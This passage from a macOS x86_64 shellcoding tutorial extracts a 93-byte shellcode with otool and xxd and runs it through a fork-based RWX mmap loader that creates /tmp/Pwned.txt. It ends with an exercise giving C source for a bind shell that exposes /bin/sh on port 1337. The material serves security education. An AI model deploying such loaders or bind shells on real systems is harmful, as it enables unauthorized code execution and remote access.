shellcoding% cat shellcode.h
unsigned char shellcode_bin[] = {
0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
};
unsigned int shellcode_bin_len = 93;
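The hex-to-binary step that xxd -r -p performs is simple enough to sketch in C, which is handy if you want to load a .hex file directly from your own tooling. This is my own illustration and not how xxd is implemented; the names `hex_digit` and `hex_to_bytes` are hypothetical, and the input is assumed to be one plain run of hex digits like the contents of shellcode.hex.

```c
#include <ctype.h>
#include <stddef.h>

/* Value of one hex digit, or -1 if the character is not a hex digit. */
static int hex_digit(char c)
{
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    c = (char)tolower((unsigned char)c);
    if (c >= 'a' && c <= 'f') {
        return c - 'a' + 10;
    }
    return -1;
}

/* Decode a plain hex string into out[]. Decoding stops at the end of
   the string or at a newline. Returns the number of bytes written,
   or -1 on malformed input or if out[] is too small. */
long hex_to_bytes(const char *hex, unsigned char *out, size_t out_size)
{
    size_t n = 0;
    while (hex[0] != '\0' && hex[0] != '\n') {
        int hi = hex_digit(hex[0]);
        int lo = (hex[1] != '\0') ? hex_digit(hex[1]) : -1;
        if (hi < 0 || lo < 0 || n >= out_size) {
            return -1;
        }
        out[n++] = (unsigned char)((hi << 4) | lo);
        hex += 2;
    }
    return (long)n;
}
```

Feeding it the contents of shellcode.hex should give back the same 93 bytes that xxd -r -p wrote to shellcode.bin.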
otool
- Extract Raw Section Bytes
shellcoding% otool -s __TEXT __text ~/shellcoding/execute.o \
| sed -n '3,$p' \
| awk '{ for(i=2;i<=NF;i++) printf "%s",$i } END{ print "" }' > shellcode_otool.hex
shellcoding% cat shellcode_otool.hex
4831c95148ba2f62696e2f7a7368524889e7bb2d630000534889e351e8210000006563686f2022573030745730307422203e202f746d702f50776e65642e7478740053574889e64831d2b83b0000020f05b801000002bf000000000f05
- Convert to binary with `xxd`
shellcoding% xxd -r -p shellcode_otool.hex > shellcode_otool.bin
- Check shellcode length
shellcoding% wc -c shellcode_otool.bin
93 shellcode_otool.bin
- Convert it to a `C` array
shellcoding% xxd -i shellcode_otool.bin > shellcode_otool.h
shellcoding% cat shellcode_otool.h
unsigned char shellcode_otool_bin[] = {
0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
};
unsigned int shellcode_otool_bin_len = 93;
Test Shellcode with Loader
Now, Let’s write a loader in C to try and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/wait.h>
#include <stdlib.h>
int main(void) {
    unsigned char code[] = {
        0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
        0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
        0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
        0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
        0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
        0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
        0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
        0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
    };
    size_t len = sizeof(code);
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return 1;
    }
    if (pid == 0) {
        // child: allocate RWX, copy shellcode and execute
        void *exec = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC,
                          MAP_ANON|MAP_PRIVATE, -1, 0);
        if (exec == MAP_FAILED) {
            perror("mmap");
            _exit(127);
        }
        memcpy(exec, code, len);
        // print from child so you can see it if child doesn't get replaced
        printf("[child %d] executing shellcode (%zu bytes)...\n", getpid(), len);
        fflush(stdout);
        int (*func)() = (int(*)())exec;
        int r = func(); // if shellcode calls execve, child will be replaced
        // If returned, report and exit child
        printf("[child %d] shellcode returned %d\n", getpid(), r);
        fflush(stdout);
        _exit(r & 0xFF);
    } else {
        // parent: wait for child and then check side-effect
        int status = 0;
        printf("[parent %d] spawned child %d, waiting...\n", getpid(), pid);
        fflush(stdout);
        if (waitpid(pid, &status, 0) == -1) {
            perror("waitpid");
            return 2;
        }
        if (WIFEXITED(status)) {
            printf("[parent] child exited with status %d\n", WEXITSTATUS(status));
        } else if (WIFSIGNALED(status)) {
            printf("[parent] child killed by signal %d\n", WTERMSIG(status));
        } else {
            printf("[parent] child ended with status 0x%x\n", status);
        }
        // small sleep to allow any async side-effects to settle
        usleep(200000);
        const char *check_path = "/tmp/Pwned.txt";
        if (access(check_path, F_OK) == 0) {
            printf("[parent] Success: '%s' exists.\n", check_path);
            return 0;
        } else {
            printf("[parent] Failure: '%s' not found (errno=%d: %s)\n",
                   check_path, errno, strerror(errno));
            return 3;
        }
    }
}
The loader's job is simple: it stores the raw machine-code bytes (the shellcode) in a C unsigned char array, allocates a memory region with execute permission, copies the bytes into that region, casts the region pointer to a function pointer, and calls it. That direct transfer of control is what lets the program run arbitrary machine code in the address space of the process. Because the shellcode can call execve, _exit, crash, or otherwise change the process state, the loader must be written with the understanding that control might never return to the C runtime after the call into the shellcode.
Step by step: unsigned char code[] = { ... }; is a local array inside main, so the bytes live on the stack rather than in the data segment, and size_t len = sizeof(code); computes the number of bytes to map and copy. The loader then calls mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0). This requests an anonymous mapping (not backed by a file) with read, write and execute permissions: NULL lets the kernel choose the address, len is the requested size, MAP_ANON|MAP_PRIVATE makes the mapping private and anonymous, and -1 and 0 are the unused file descriptor and offset. If mmap fails (returns MAP_FAILED), the loader prints the error and exits. After a successful mapping, the loader uses memcpy(exec, code, len) to place the shellcode bytes into the mapped pages, then casts the void * returned by mmap to a function pointer (int (*func)() = (int(*)())exec;) and calls func(). Converting a data pointer to a function pointer and calling it is not guaranteed by the ISO C standard, but it is the de facto technique used on POSIX systems for this purpose.
What happens when func() executes depends entirely on what the shellcode does. If the shellcode is written to return cleanly, it restores the registers and the stack appropriately and the loader continues after the call. If the shellcode invokes execve() successfully, the kernel replaces the entire process image with a new program, so none of the loader's code after the call executes. If the shellcode calls _exit() or the process receives a fatal signal (segfault, illegal instruction), the process terminates and again no post-call statements run. Shellcode that corrupts the stack or registers without restoring them also produces undefined behavior in the loader when control returns. In short: in a single-process loader, seeing only the print before the call usually means the shellcode replaced, terminated, or crashed the process before the prints after the call could run.
This is why the loader above forks: it isolates the untrusted shellcode in a child process while the parent stays alive to observe the results. After fork(), the child performs the mapping, the copy and the call into the shellcode, so any execve or _exit affects only the child. The parent calls waitpid(pid, &status, 0) to get the child's exit status and can report whether the child exited normally, was killed by a signal, or returned a particular code. The parent can also check for side effects such as files written by the child (for example /tmp/Pwned.txt) and print reliable diagnostics. This pattern is ideal for debugging shellcode that tends to replace or terminate its host process, because the parent becomes the stable observer.
- Compile and Test the shellcode with the loader
zeyadazima.com% clang -o cloader cloader.c
zeyadazima.com% ./cloader
[parent 29373] spawned child 29374, waiting...
[child 29374] executing shellcode (93 bytes)...
[parent] child exited with status 0
[parent] Success: '/tmp/Pwned.txt' exists.
As we can see, our shellcode executed successfully: the child exited with status 0 and /tmp/Pwned.txt was created.
Exercises
If you want to dive deeper, try this exercise: write a BindShell shellcode and execute it.
Here is everything you need for the exercise:
- BindShell C code
// Source - https://stackoverflow.com/q
// Posted by gatorface, modified by community. See post 'Timeline' for change history
// Retrieved 2025-11-10, License - CC BY-SA 3.0
// Author: Julien Ahrens (@MrTuxracer)
// Website: http://www.rcesecurity.com
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
    int i;                        // used for dup2 later
    int sockfd;                   // socket file descriptor
    int clientfd;                 // client file descriptor
    socklen_t socklen;            // socket-length for new connections
    struct sockaddr_in srv_addr;  // server aka listen address
    struct sockaddr_in cli_addr;  // client address
    srv_addr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    srv_addr.sin_port = htons( 1337 );              // server port, converted to network byte order
    srv_addr.sin_addr.s_addr = htonl (INADDR_ANY);  // listen on any address, converted to network byte order
    // create new TCP socket
    sockfd = socket(2, 1, 0);
    // bind socket
    bind( sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr) );
    // listen on socket
    listen(sockfd, 0);
    // accept new connections
    socklen = sizeof(cli_addr);
    clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &socklen );
    // dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
    for(i = 0; i <= 2; i++)
        dup2(clientfd, i);
    // magic
    // execve( "/bin/sh", NULL, NULL );
    //UPDATE: fixed exec call, shell still not returned to
    // client connecting with execl or proper execve
    execl("/bin/sh", "/bin/sh", (char *)NULL);
}
Tasks:
- Use execve() instead of execl.
- Collect the syscall numbers for socket, bind, listen, accept and dup2; you will use them to build your BindShell.
- Study each function's arguments and prepare them for the corresponding syscalls.
- Pay close attention to the struct, because building it is similar to the way we built arrays.
- Use the kernel source code to look up constant values, such as #define AF_INET, and explore the source to help you write your shellcode.
Help?
If you have any questions or need help, you can contact me:
- Twitter/X
- Email: contact@zeyadazima.com
- Discord: .killer_1337 (including the leading dot)
Conclusion
We explored the fundamentals of writing shellcode on macOS for the x86_64 architecture. We set up a proper lab environment, understood the XNU kernel and its syscall classes, and clarified calling conventions and register usage crucial for crafting shellcode. By following a structured workflow—starting from C code, identifying syscalls, converting to assembly, and handling arguments—we successfully created shellcodes for printing text, terminating processes, and executing commands. Through these examples, we demonstrated practical techniques such as handling arguments on the stack, using position-independent code, and correctly invoking syscalls in the BSD subsystem of macOS. This foundation sets the stage for more advanced topics.
References
- https://codebrowser.dev/
- https://man.freebsd.org/
- https://pubs.opengroup.org
- https://man7.org/linux/man-pages/
- https://opensource.apple.com/releases/
- https://github.com/apple-oss-distributions/xnu
- https://xcodereleases.com
- https://newosxbook.com